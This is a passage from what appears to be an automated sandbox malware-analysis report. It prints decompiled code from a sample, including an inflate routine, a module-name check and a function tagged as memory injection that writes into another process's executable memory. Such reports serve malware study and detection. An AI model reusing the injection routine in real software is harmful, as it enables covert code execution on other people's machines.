				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x41f640 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x41f640 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x41f640 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x41f640 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x41f640 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x41278c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x41278c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x41278c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x41278c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}

0x0041280f
0x00412814
0x00412815
0x00412818
0x00412819
0x0041281d
0x00412823
0x0041282a
0x0041282e
0x00412836
0x00412839
0x0041284a
0x0041284e
0x00412852
0x0041285c
0x00412860
0x0041286f
0x0041287d
0x00412881
0x00412887
0x0041288a
0x0041288e
0x00412892
0x00412896
0x00412899
0x0041289c
0x004128a0
0x004128a6
0x004128ca
0x004128d0
0x004128d6
0x004128d7
0x004128d9
0x004128dc
0x004128de
0x00000000
0x004128de
0x00000000
0x004128a8
0x004128ab
0x004128be
0x004128be
0x004128be
0x004128c0
0x004128c4
0x004128e2
0x004128e2
0x004128e6
0x004128e6
0x004128ed
0x00000000
0x00000000
0x004128f3
0x00412960
0x00412963
0x00412967
0x00412969
0x0041296b
0x00412970
0x00412970
0x0041297b
0x0041297e
0x00412980
0x00412982
0x00412986
0x0041298b
0x0041298b
0x0041298b
0x004129a3
0x004129a6
0x004129aa
0x00412aa6
0x00412dba
0x00412dbc
0x00412dca
0x00412dcf
0x00412dbe
0x00412dbe
0x00412dc3
0x00412dc3
0x00412de6
0x00412de6
0x00412dec
0x00412dee
0x00412dee
0x00412df4
0x00000000
0x00412df4
0x00412abc
0x00000000
0x00412abc
0x004129b0
0x004129b3
0x004129b7
0x004129bd
0x004129bf
0x004129c1
0x004129c6
0x004129c8
0x004129c8
0x004129d2
0x004129d4
0x004129d6
0x004129d8
0x004129d8
0x004129da
0x004129e1
0x004129e5
0x004129e7
0x004129e9
0x004129ee
0x004129ee
0x004129fa
0x004129fd
0x004129ff
0x00412a04
0x00412a06
0x00412a08
0x00412a0c
0x00000000
0x00000000
0x00412ac6
0x00412dae
0x00412dae
0x00412db3
0x00000000
0x00412db3
0x00412adc
0x00412adc
0x00412a12
0x00412a15
0x00412a7f
0x00412a3e
0x00412a3e
0x00412a44
0x00412a4a
0x00412ae6
0x00412aea
0x00412aec
0x00412af2
0x00412dd6
0x00412dd6
0x00412dda
0x00412ddf
0x00000000
0x00412ddf
0x00412af8
0x00412aff
0x00412b25
0x00412b2b
0x00412b5b
0x00412b5d
0x00412b63
0x00412b67
0x00412b67
0x00412b67
0x00412b6b
0x00412b6b
0x00412b2d
0x00412b33
0x00412b35
0x00412b37
0x00412b3d
0x00412b41
0x00412b41
0x00412b41
0x00412b43
0x00412b47
0x00412b4d
0x00412b51
0x00412b51
0x00412b51
0x00412b55
0x00412b55
0x00412b4d
0x00412b3d
0x00412b01
0x00412b03
0x00412b05
0x00412b0b
0x00412b0f
0x00412b0f
0x00412b0f
0x00412b13
0x00412b13
0x00412b0b
0x00412b6d
0x00412b6f
0x00412b6f
0x00412b6f
0x00412b71
0x00000000
0x00412b71
0x00412a56
0x00412a58
0x00412a5d
0x00412a65
0x00412a68
0x00412a6b
0x00412a71
0x00412a71
0x00412a71
0x00412a73
0x00412a87
0x00412a87
0x00412a8c
0x00412a8e
0x00412a91
0x00412a94
0x00412a97
0x00412a9a
0x00412a9d
0x00412a9d
0x00412a9d
0x00412a9d
0x00000000
0x00412a7f
0x00412a19
0x00412a1f
0x00412a21
0x00412a23
0x00412a28
0x00412a2a
0x00412a2a
0x00412a34
0x00412a36
0x00412a38
0x00412a3a
0x00000000
0x00412a3a
0x0041298c
0x0041298c
0x00412df8
0x00412dff
0x00412e01
0x00412e01
0x00412e03
0x00412e09
0x00412e0c
0x00412e0f
0x00412e14
0x00412e16
0x00412e19
0x00412e1c
0x00412e1e
0x00412e26
0x00412e2a
0x00412e2c
0x00412e30
0x00412e38
0x00412e38
0x00412e3c
0x00412e45
0x00412e4d
0x00412e4f
0x00412e52
0x00412e55
0x00412e55
0x00412e59
0x00412e5c
0x00412e62
0x00412e75
0x00412e64
0x00412e69
0x00412e69
0x00412e78
0x00412e7e
0x00412e97
0x00412e80
0x00412e88
0x00412e88
0x00412e9d
0x00412ea2
0x00412ea2
0x004128f5
0x004128f6
0x004128f7
0x004128f8
0x004128f9
0x004128fd
0x00412904
0x00412905
0x00412906
0x00412907
0x00412909
0x0041294f
0x0041294f
0x00412959
0x00412959
0x0041295a
0x0041295b
0x0041295c
0x00000000
0x0041295c
0x0041290d
0x00412915
0x00000000
0x00412927
0x0041292c
0x00412937
0x00000000
0x00412943
0x00412943
0x00000000
0x00412943
0x00412937
0x00412915
0x00412b7c
0x00412b7e
0x00412b81
0x00412b83
0x00412b87
0x00412b8a
0x00412b8f
0x00412b92
0x00412b95
0x00412b9c
0x00412b9c
0x00412ba2
0x00412ba4
0x00412ba7
0x00412baa
0x00412bad
0x00412bb0
0x00412bb3
0x00412bb3
0x00412bb6
0x00412bb9
0x00412bbc
0x00412bbf
0x00412bc2
0x00412bc2
0x00412bc5
0x00412bc8
0x00412bcc
0x00000000
0x00000000
0x00412be9
0x00412bee
0x00412cd6
0x00000000
0x00000000
0x00412cdf
0x00412ce2
0x00412cee
0x00000000
0x00412cee
0x00412bf4
0x00412bf7
0x00412bf9
0x00412bfc
0x00412bff
0x00412c02
0x00412c0b
0x00412c0b
0x00412c0d
0x00412c13
0x00412c15
0x00412c18
0x00412c1b
0x00412c1e
0x00412c21
0x00412c24
0x00412c24
0x00412c2b
0x00412c2e
0x00412c31
0x00412c34
0x00412c37
0x00412c37
0x00412c3c
0x00412c3f
0x00412c41
0x00412c46
0x00000000
0x00000000
0x00412cfa
0x00000000
0x00000000
0x00412d03
0x00412d06
0x00412d16
0x00412d16
0x00412c4c
0x00412c4f
0x00412cab
0x00412c65
0x00412c65
0x00412c6b
0x00412c71
0x00412d22
0x00412d26
0x00412d28
0x00412d2e
0x00000000
0x00000000
0x00412d34
0x00412d3b
0x00412d5d
0x00412d63
0x00412d8f
0x00412d93
0x00412d95
0x00412d97
0x00412d97
0x00412d97
0x00412d9b
0x00412d9b
0x00412d65
0x00412d6b
0x00412d6d
0x00412d71
0x00412d73
0x00412d75
0x00412d75
0x00412d75
0x00412d77
0x00412d7b
0x00412d81
0x00412d83
0x00412d85
0x00412d85
0x00412d85
0x00412d89
0x00412d89
0x00412d81
0x00412d71
0x00412d3d
0x00412d3f
0x00412d43
0x00412d45
0x00412d47
0x00412d47
0x00412d47
0x00412d4b
0x00412d4b
0x00412d43
0x00412d9d
0x00412d9f
0x00412d9f
0x00412d9f
0x00412da1
0x00412da5
0x00000000
0x00412da5
0x00412c7b
0x00412c7d
0x00412c82
0x00412c8a
0x00412c8d
0x00412c90
0x00412c96
0x00412c96
0x00412c96
0x00412c98
0x00412c9c
0x00000000
0x00412cb3
0x00412cb3
0x00412cb6
0x00412cb8
0x00412cbb
0x00412cbe
0x00412cc1
0x00412cc4
0x00412cc7
0x00412cc7
0x00412cc7
0x00412cc9
0x00412bd2
0x00412bd6
0x00000000
0x00000000
0x00000000
0x00412bd6
0x00412cab
0x00412c51
0x00412c54
0x00412c57
0x00412c5a
0x00412c63
0x00000000
0x00412c63
0x00412bce
0x00412bd1
0x00000000
0x00412bdc
0x00412bdc
0x00000000
0x00412be2

Strings

invalid literal/length code, xrefs: 00412DCA
ntel, xrefs: 00412917
invalid distance code, xrefs: 00412DAE
invalid distance too far back, xrefs: 00412DDA
Genu, xrefs: 0041290F
ineI, xrefs: 0041291F

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: 6378b55e09d1a1b2e83ed9bf43ec89cbfeef197e8958510f9d6ab7d419091f01
Instruction ID: faf91f3c43b6aac758ec8c4fdd7af90a68a38778fbf61ddcf8f4f4b994f91576
Opcode Fuzzy Hash: 6378b55e09d1a1b2e83ed9bf43ec89cbfeef197e8958510f9d6ab7d419091f01
Instruction Fuzzy Hash: 18122831A083564FC714DE3CC68029BB7E1BF84354F14862EE895D3B41D3B9ADA9C78A

Uniqueness

Uniqueness Score: 0.90%

Function 0040B120, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
UNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E0040B120() {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v284;
				signed int _v288;
				char* _v292;
				char* _t27;
				void* _t41;
				void* _t42;

				_v8 = 0;
				_v20 = 0x2677;
				_v16 = 0x2317;
				_v12 = 0x1ece;
				while(0 != 0) {
				}
				GetModuleFileNameA(GetModuleHandleA(0),  &_v284, 0x103);
				_v288 = 0;
				while(_v288 < 3) {
					_t27 = E00408060( *((intOrPtr*)(_t41 + _v288 * 4 - 0x10)),  *((intOrPtr*)(_t41 + _v288 * 4 - 0x10)));
					_t42 = _t42 + 4;
					_v292 = _t27;
					if(_v292 == 0) {
						L12:
						_v288 = _v288 + 1;
						continue;
					} else {
						if(StrStrIA( &_v284, _v292) == 0) {
							E00408170( &_v292);
							_t42 = _t42 + 4;
							goto L12;
						} else {
							while(0 != 0) {
							}
							_v8 = 1;
							E00408170( &_v292);
							L13:
							while(0 != 0) {
							}
							return _v8;
						}
					}
					goto L13;
				}
				goto L13;
			}

0x0040b129
0x0040b130
0x0040b137
0x0040b13e
0x0040b145
0x0040b149
0x0040b160
0x0040b166
0x0040b181
0x0040b195
0x0040b19a
0x0040b19d
0x0040b1aa
0x0040b1f1
0x0040b17b
0x00000000
0x0040b1ac
0x0040b1c2
0x0040b1e9
0x0040b1ee
0x00000000
0x0040b1c4
0x0040b1c4
0x0040b1c8
0x0040b1ca
0x0040b1d8
0x00000000
0x0040b1f6
0x0040b1fa
0x0040b202
0x0040b202
0x0040b1c2
0x00000000
0x0040b1aa
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000103), ref: 0040B159
GetModuleFileNameA.KERNEL32(00000000), ref: 0040B160
StrStrIA.SHLWAPI(?,00000000), ref: 0040B1BA

Strings

w&, xrefs: 0040B130

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Module$FileHandleName
String ID: w&
API String ID: 4146042529-4088035379
Opcode ID: d2971b478416e50fc6f3086666f1b9161114dc111e264c445163f8bef04d8094
Instruction ID: 22692d1a5b10d790f7cf41f68a44a40a7b626d8d8e06ceac6db86d1e067cf03e
Opcode Fuzzy Hash: d2971b478416e50fc6f3086666f1b9161114dc111e264c445163f8bef04d8094
Instruction Fuzzy Hash: B9218BB0900208EBDB15CB60DC19BEAB674FB09304F1481AA99057A281D7789A56DFCA

Uniqueness

Uniqueness Score: 100.00%

Function 00404540, Relevance: 4.6, APIs: 3, Instructions: 51
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00404540(void* _a4, void* _a8, long _a12) {
				void* _v8;
				long _v12;

				_v12 = 0;
				_v8 = VirtualAllocEx(_a4, 0, _a12, 0x1000, 0x40);
				if(_v8 != 0) {
					if(WriteProcessMemory(_a4, _v8, _a8, _a12, 0) != 0) {
						return _v8;
					}
					while(0 != 0) {
					}
					if(_v8 != 0) {
						VirtualFreeEx(_a4, _v8, 0, 0x8000);
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x00404546
0x00404564
0x0040456b
0x00404591
0x00000000
0x0040459b
0x00404593
0x00404597
0x004045a4
0x004045b5
0x004045b5
0x00000000
0x004045bb
0x0040456d
0x00404571
0x00000000

APIs

VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00001000,00000040), ref: 0040455E
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404589
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 004045B5

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Virtual$AllocFreeMemoryProcessWrite
String ID:
API String ID: 3247110995-0
Opcode ID: b7a2a082f79b0cea84812f93aea8ae927642d054d7296be17adfa25ce3f8d4a5
Instruction ID: 935ed64f5d8bacad4cc7876e5722bd0124c9c036849dbbf581c478855cfe7518
Opcode Fuzzy Hash: b7a2a082f79b0cea84812f93aea8ae927642d054d7296be17adfa25ce3f8d4a5
Instruction Fuzzy Hash: EC0152B5600208FBDB10CFA4DC44FAB77B4AB88700F508575FB05A72C4D2789A419759

Uniqueness

Uniqueness Score: 0.85%

Function 0040A800, Relevance: 3.8, APIs: 3, Instructions: 42COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0040A824
memcpy.MSVCRT ref: 0040A839
memcpy.MSVCRT ref: 0040A84E

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 0357cbf33e672c70561c28aaffe64d47697cebb222fddf406285d48adaefbd47
Instruction ID: d691c93037d647f08ce51bede07346d7c4f0ab2e26855a2a5039420d611b8802
Opcode Fuzzy Hash: 0357cbf33e672c70561c28aaffe64d47697cebb222fddf406285d48adaefbd47
Instruction Fuzzy Hash: DCF0A9B1D0420877C744EFA5DC81E9ABBA8AB44308F04C06DF70CE7241E57596588B9A

Uniqueness

Uniqueness Score: 0.03%

Function 0040AC10, Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040AC10(intOrPtr _a4, intOrPtr _a8, char* _a12) {
				char _v8;
				signed int _v12;
				char _v16;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;

				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				while(1) {
					_t30 = _a12;
					_t22 = _a4;
					__imp__SetupDiGetDeviceRegistryPropertyA(_t22, _a8, _a12,  &_v8, _v16, _v12,  &_v12);
					if(_t22 != 0) {
						break;
					}
					if(GetLastError() != 0x7a) {
						if(_v16 != 0) {
							E00403F10( &_v16, 0);
							_v16 = 0;
						}
					} else {
						if(_v16 != 0) {
							_t30 =  &_v16;
							E00403F10( &_v16, 0);
							_t35 = _t35 + 8;
						}
						_t27 = E00403EE0(_t30, _v12 << 1);
						_t35 = _t35 + 4;
						_v16 = _t27;
						if(_v16 != 0) {
							continue;
						} else {
						}
					}
					break;
				}
				return _v16;
			}

0x0040ac16
0x0040ac1d
0x0040ac24
0x0040ac2b
0x0040ac3b
0x0040ac43
0x0040ac47
0x0040ac4f
0x00000000
0x00000000
0x0040ac5a
0x0040ac8f
0x0040ac97
0x0040ac9f
0x0040ac9f
0x0040ac5c
0x0040ac60
0x0040ac64
0x0040ac68
0x0040ac6d
0x0040ac6d
0x0040ac76
